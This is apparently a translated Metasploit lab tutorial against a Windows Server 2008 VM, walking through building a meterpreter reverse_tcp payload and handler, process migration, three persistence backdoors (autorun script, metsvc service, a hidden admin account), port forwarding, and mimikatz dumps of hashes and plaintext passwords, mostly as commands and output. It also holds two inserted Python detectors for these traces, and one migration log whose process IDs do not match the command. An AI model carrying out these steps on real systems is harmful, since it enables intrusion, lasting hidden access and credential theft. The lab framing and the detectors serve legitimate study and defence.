Metasploit backdoor

Attacker:
OS: Kali
IP: 192.168.111.129

Victim:
OS: Windows Server 2008 (64-bit)
IP: 192.168.111.133

First, generate the meterpreter payload on Kali:

root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}

Next, configure the listener:

root@Kali:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...

Then run file.exe on the Windows 2008 machine; a meterpreter session comes back:

[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800

meterpreter >

Now to the main topic.
(1). Migrating meterpreter into another process
During a penetration test the current meterpreter process is easily killed for all sorts of reasons, so migrating meterpreter into a long-lived system process is a good idea.

meterpreter > getuid   // check the current privileges
Server username: WIN-K30V5SI0PCE\Administrator
meterpreter > ps   // list the current processes

Process List
============

 PID   PPID  Name              Arch    Session  User                           Path
 ---   ----  ----              ----    -------  ----                           ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 244   4     smss.exe          x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\smss.exe
 264   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 336   328   csrss.exe         x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 388   380   csrss.exe         x86_64  1        NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 396   328   wininit.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\wininit.exe
 432   380   winlogon.exe      x86_64  1        NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 492   396   services.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\services.exe
 500   396   lsass.exe         x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe
 512   396   lsm.exe           x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\lsm.exe
 596   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 656   492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 748   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 796   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 840   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 856   388   conhost.exe       x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\conhost.exe
 860   2044  cmd.exe           x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\cmd.exe
 884   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 924   492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 972   492   sppsvc.exe        x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\taskhost.exe
 2024  884   dwm.exe           x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\dwm.exe
 2044  2016  explorer.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\explorer.exe
 2204  2428  mscorsvw.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2312  492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 2332  2044  file.exe          x86     1        WIN-K30V5SI0PCE\Administrator  C:\Users\Administrator\Desktop\file.exe
 2428  492   mscorsvw.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0        NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe

meterpreter > migrate 2044   // migrate into the explorer.exe process with PID 2044
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

Verify:

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session  User                           Path
 ---   ----  ----              ----    -------  ----                           ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 244   4     smss.exe          x86_64  0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 264   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 336   328   csrss.exe         x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 388   380   csrss.exe         x86_64  1        NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 396   328   wininit.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\wininit.exe
 432   380   winlogon.exe      x86_64  1        NT AUTHORITY\SYSTEM            C:\Windows\system32\winlogon.exe
 492   396   services.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\services.exe
 500   396   lsass.exe         x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\lsass.exe
 512   396   lsm.exe           x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\lsm.exe
 596   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 656   492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 748   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 796   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 840   492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 856   388   conhost.exe       x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\conhost.exe
 860   2044  cmd.exe           x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\cmd.exe
 884   492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 924   492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 972   492   sppsvc.exe        x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0        NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\taskhost.exe
 2024  884   dwm.exe           x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\Dwm.exe
 2044  2016  explorer.exe      x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\Explorer.EXE
 2312  492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 2428  492   mscorsvw.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0        NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe

As shown above, the file.exe process is gone. Note that antivirus software, if present, may block the process injection.
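The migration above is exactly what makes process-list review unreliable on its own: once meterpreter lives inside explorer.exe, `ps` looks clean. As an added example (not code from the original post), here is a small Python triage script that joins a `ps`-style process snapshot with a `netstat -ano`-style connection table. It flags the dropper as it appears before migration (a 32-bit image on a 64-bit host started from a user-writable path, like file.exe above) and, after migration, the shell process that still owns the reverse_tcp session. The snapshot and connection rows are constructed to resemble the listings in this post; the `QUIET_HOSTS` set and the remote-port allowlist are heuristics chosen for the example, not anything on the page.

```python
"""Hunting for a migrated implant by joining a process snapshot with a
connection table. Added example for this post, not part of the original."""
import re
from typing import List, NamedTuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str
    arch: str
    session: int
    user: str
    path: str


class Conn(NamedTuple):
    pid: int
    raddr: str
    rport: int
    state: str


class Finding(NamedTuple):
    pid: int
    name: str
    reason: str


# One row of the meterpreter `ps` table: PID PPID Name Arch Session User Path.
# User ("NT AUTHORITY\SYSTEM") and Path ("C:\Program Files\...") contain spaces,
# so the path is anchored on a drive letter or \SystemRoot instead of split().
PS_ROW = re.compile(
    r"^(\d+)\s+(\d+)\s+(\S+)\s+(x86_64|x86)\s+(\d+)"
    r"(?:\s+(.+?)\s+((?:[A-Za-z]:|\\SystemRoot)\\.*?))?\s*$"
)
# One row of a `netstat -ano`-style table: Proto Local Foreign State PID.
CONN_ROW = re.compile(r"^TCP\s+\S+:\d+\s+(\S+):(\d+)\s+(\S+)\s+(\d+)$")

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
# Shell and session processes that have no business holding an outbound TCP
# session to an arbitrary port; a migrated implant hides inside exactly these.
QUIET_HOSTS = {"explorer.exe", "winlogon.exe", "conhost.exe", "dwm.exe", "taskhost.exe"}
EXPECTED_REMOTE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445}


def parse_ps(text: str) -> List[Proc]:
    procs = []
    for line in text.splitlines():
        m = PS_ROW.match(line.strip())
        if not m:
            continue  # headers, separators and the arch-less [System Process] row
        pid, ppid, name, arch, session, user, path = m.groups()
        procs.append(Proc(int(pid), int(ppid), name, arch, int(session), user or "", path or ""))
    return procs


def parse_conns(text: str) -> List[Conn]:
    conns = []
    for line in text.splitlines():
        m = CONN_ROW.match(line.strip())
        if m:
            raddr, rport, state, pid = m.groups()
            conns.append(Conn(int(pid), raddr, int(rport), state))
    return conns


def triage(ps_text: str, conn_text: str) -> List[Finding]:
    procs = parse_ps(ps_text)
    conns = parse_conns(conn_text)
    host_arch = "x86_64" if any(p.arch == "x86_64" for p in procs) else "x86"
    by_pid = {p.pid: p for p in procs}
    findings = []
    # Rule 1: the dropper itself. A 32-bit image on a 64-bit host, started from a
    # user-writable directory, is how file.exe looks before it migrates.
    for p in procs:
        if host_arch == "x86_64" and p.arch == "x86" and any(m in p.path.lower() for m in USER_WRITABLE):
            findings.append(Finding(p.pid, p.name, "32-bit image in user-writable path on 64-bit host"))
    # Rule 2: after migration the process list looks clean, but the reverse_tcp
    # session is still owned by the host process. Look for it there.
    for c in conns:
        p = by_pid.get(c.pid)
        if p and c.state == "ESTABLISHED" and p.name.lower() in QUIET_HOSTS \
                and c.rport not in EXPECTED_REMOTE_PORTS:
            findings.append(Finding(p.pid, p.name, f"unexpected outbound TCP to {c.raddr}:{c.rport}"))
    return findings


# Constructed snapshot modeled on the listings in this post (not captured output).
SAMPLE_PS = r"""
 PID   PPID  Name             Arch    Session  User                           Path
 ---   ----  ----             ----    -------  ----                           ----
 4     0     System           x86_64  0
 492   396   services.exe     x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\services.exe
 596   492   svchost.exe      x86_64  0        NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 2044  2016  explorer.exe     x86_64  1        WIN-K30V5SI0PCE\Administrator  C:\Windows\explorer.exe
 2332  2044  file.exe         x86     1        WIN-K30V5SI0PCE\Administrator  C:\Users\Administrator\Desktop\file.exe
 2520  372   FfBoPtYGlNj.exe  x86     1        WIN-K30V5SI0PCE\Administrator  C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe
"""
SAMPLE_CONNS = """
  Proto  Local Address          Foreign Address        State        PID
  TCP    192.168.111.133:49168  192.168.111.129:2013   ESTABLISHED  2044
  TCP    192.168.111.133:49200  192.168.111.10:445     ESTABLISHED  2044
  TCP    192.168.111.133:49170  192.168.111.20:443     ESTABLISHED  596
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING    1640
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_PS, SAMPLE_CONNS):
        print(f"PID {f.pid:<5} {f.name:<16} {f.reason}")
```

On the constructed data the script reports file.exe and the Temp-resident FfBoPtYGlNj.exe under rule 1, and explorer.exe under rule 2 because of its established session to 192.168.111.129:2013; the SMB and HTTPS sessions pass. The second rule is the one worth keeping in a real hunt: it survives the migration, whereas the first only sees the dropper while it is still running.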
(2). Checking whether the target is a virtual machine

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

My 2008 box is installed on VMware.
(3). Installing a backdoor
Method 1: the persistence script

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Run it:

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
meterpreter >

Now exit the server and reconfigure the listener:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >

As shown, the connect-back succeeded. This passive-style backdoor is a good choice in certain special situations.
Method 2: metsvc

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
meterpreter >

The metsvc backdoor is installed; next, connect to it:

root@Kali:~# msfconsole

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
+ -- --=[ 1239 exploits - 755 auxiliary - 207 post
+ -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >

Method 3: adding an account for RDP
This one amounts to adding a user account and connecting over Remote Desktop on port 3389.

meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] 	Adding User: zero with Password: haizeiwang123_
[*] 	Hiding user from Windows Login screen
[*] 	Adding User: zero to local group 'Remote Desktop Users'
[*] 	Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >
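All three methods leave inspectable traces on the host: a random-named Run value pointing at a .vbs in %TEMP% (method 1), a service named metsvc whose binaries were uploaded to a temp directory (method 2), and a new account placed in Administrators and Remote Desktop Users and hidden from the logon screen (method 3). The following Python audit is an added example, not code from the post or from Metasploit; it checks a snapshot of those artifacts against a known-good baseline. The snapshot is constructed: `EXAMPLEDIR` stands in for the random temp directory name, the Run value's command line is assumed, and treating a zero DWORD under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList` as the hiding mechanism is an assumption (the post only says the user is hidden). The dict layout of `SNAPSHOT` is an assumed representation of exported registry values, service image paths and local group membership.

```python
r"""Auditing a Windows host for the three persistence artifacts this post leaves
behind. Added example for this post, not Metasploit's code; the snapshot below is
constructed, and the SpecialAccounts\UserList check is an assumption about how
the account is hidden (the post only says it is hidden from the logon screen)."""
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    category: str
    subject: str
    detail: str


USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
SCRIPT_EXT = (".vbs", ".js", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
# Pulls the first drive-letter path (optionally quoted) out of a command line
# such as  "C:\Program Files\X\y.exe" -n vmusr  or  wscript.exe "C:\...\z.vbs".
WIN_PATH = re.compile(r'"?([A-Za-z]:\\[^"]+?\.[A-Za-z0-9]{1,4})"?(?=\s|$)')
PRIVILEGED_GROUPS = ("Administrators", "Remote Desktop Users")


def first_path(command: str) -> str:
    m = WIN_PATH.search(command)
    return m.group(1) if m else command


def audit_run_keys(values: Dict[str, str]) -> List[Finding]:
    r"""HKLM\...\CurrentVersion\Run values: the persistence script drops a .vbs
    in %TEMP% and registers it under a random value name."""
    out = []
    for name, command in values.items():
        path = first_path(command).lower()
        if any(m in path for m in USER_WRITABLE) or path.endswith(SCRIPT_EXT):
            out.append(Finding("autorun", name, f"Run value launches {path}"))
    return out


def audit_services(services: Dict[str, str]) -> List[Finding]:
    """Service image paths: metsvc installs its binaries from a temp directory."""
    out = []
    for name, image in services.items():
        path = first_path(image).lower()
        if any(m in path for m in USER_WRITABLE):
            out.append(Finding("service", name, f"service binary under {path}"))
    return out


def audit_groups(current: Dict[str, List[str]], baseline: Dict[str, List[str]]) -> List[Finding]:
    """getgui adds its user to Administrators and Remote Desktop Users; diff
    those groups against a known-good baseline."""
    out = []
    for group in PRIVILEGED_GROUPS:
        added = set(current.get(group, [])) - set(baseline.get(group, []))
        for member in sorted(added):
            out.append(Finding("group", member, f"added to local group '{group}'"))
    return out


def audit_hidden_users(userlist: Dict[str, int]) -> List[Finding]:
    r"""Assumed mechanism: a DWORD 0 under HKLM\SOFTWARE\Microsoft\Windows NT\
    CurrentVersion\Winlogon\SpecialAccounts\UserList hides that account from
    the logon screen. Any entry there deserves a look."""
    return [Finding("hidden-user", user, "hidden from logon screen via SpecialAccounts\\UserList")
            for user, flag in userlist.items() if flag == 0]


def audit(snapshot: dict, baseline: dict) -> List[Finding]:
    return (audit_run_keys(snapshot["run"])
            + audit_services(snapshot["services"])
            + audit_groups(snapshot["groups"], baseline["groups"])
            + audit_hidden_users(snapshot["userlist"]))


# Constructed snapshot modeled on the output in this post; EXAMPLEDIR stands in
# for the random temp directory name, and the Run value's command line is assumed.
SNAPSHOT = {
    "run": {
        "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr',
        "HstWtPyXHYnhQ": r'wscript.exe "C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs"',
    },
    "services": {
        "Spooler": r"C:\Windows\System32\spoolsv.exe",
        "metsvc": r"C:\Users\ADMINI~1\AppData\Local\Temp\EXAMPLEDIR\metsvc.exe",
    },
    "groups": {
        "Administrators": ["Administrator", "zero"],
        "Remote Desktop Users": ["zero"],
    },
    "userlist": {"zero": 0},
}
BASELINE = {"groups": {"Administrators": ["Administrator"], "Remote Desktop Users": []}}

if __name__ == "__main__":
    for f in audit(SNAPSHOT, BASELINE):
        print(f"[{f.category}] {f.subject}: {f.detail}")
```

The group diff is the check with the best signal-to-noise ratio: a baseline of expected Administrators and Remote Desktop Users members rarely changes on a server, so any new name is worth a ticket. The path heuristics for Run values and services will also catch some legitimate software installed per-user, which is why the output is a list of findings to review rather than a verdict.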

(4). Port forwarding
It is common for the host to sit on an internal network; metasploit ships with a port forwarding tool.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >

The first attempt failed because uppercase -L is the listen address; the listen port is lowercase -l. Next, run:

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

and you can connect.
(5). Grabbing passwords
The French tool mimikatz can pull the operating system's plaintext passwords directly, and meterpreter has added it as a module.
First load the mimikatz module.
Since my Windows 2008 is 64-bit, migrate to a 64-bit process first:

meterpreter > ps
......
 2000  472   dllhost.exe      x86_64  0  NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 2264  1832  explorer.exe     x86_64  2  WIN-K30V5SI0PCE\zero           C:\Windows\explorer.exe
 2292  2264  vmtoolsd.exe     x86_64  2  WIN-K30V5SI0PCE\zero           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2520  372   FfBoPtYGlNj.exe  x86     1  WIN-K30V5SI0PCE\Administrator  C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe
 2780  2256  winlogon.exe     x86_64  2  NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 3028  880   dwm.exe          x86_64  2  WIN-K30V5SI0PCE\zero           C:\Windows\System32\dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

Dump the password hashes:

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;47971   NTLM                                          n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)

Dump the plaintext passwords:

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$
0;47971   NTLM
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;995     Negotiate  NT AUTHORITY     IUSR
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_
0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_
0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_